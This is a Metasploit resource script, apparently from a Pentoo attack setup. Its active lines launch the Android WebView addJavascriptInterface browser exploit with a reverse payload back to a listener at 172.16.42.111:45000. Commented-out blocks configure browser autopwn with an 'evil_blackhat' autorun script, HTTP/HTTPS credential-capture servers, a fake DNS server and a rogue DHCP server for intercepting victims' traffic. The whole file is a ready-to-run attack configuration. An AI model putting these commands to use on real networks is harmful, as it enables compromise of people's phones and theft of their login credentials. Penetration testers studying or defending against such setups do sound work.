use exploit/android/browser/webview_addjavascriptinterface
set SRVPORT 80
set URIPATH 0
set LHOST 172.16.42.111
set LPORT 45000
run

#start browser autopwn
#use auxiliary/server/browser_autopwn
#setg AUTOPWN_HOST 192.168.1.42
#setg AUTOPWN_PORT 55550
#setg AUTOPWN_URI /ads
#set LHOST 192.168.1.42
#set LPORT 45000
#set SRVPORT 55550
#set URIPATH /ads
#examples of MATCH and EXCLUDE statements to narrow the attack
#set MATCH java
#set EXCLUDE mozilla_navigatorjava
#set AutoRunScript multi_console_command -rc /usr/src/pentoo/msfflashbang/evil_blackhat.rc
#run

#use auxiliary/server/capture/http
#set SRVPORT 80
#set SSL false
#run

#examples of capturing more ports
#use auxiliary/server/capture/http
#set SRVPORT 443
#set SSL true
#run

#use auxiliary/server/capture/http
#set SRVPORT 8080
#set SSL false
#run

#use auxiliary/server/fakedns
#set TARGETHOST 192.168.1.42
#set SRVPORT 53
#set TARGETACTION BYPASS
#set TARGETDOMAIN www.evilhackerdomain.com
#run

#the dhcp server seems to mostly not work at all
#use auxiliary/server/dhcp
#set SRVHOST 192.168.1.42
#set NETMASK 255.255.255.0
#set DNSSERVER 192.168.1.42
#set ROUTER 192.168.1.42
#run
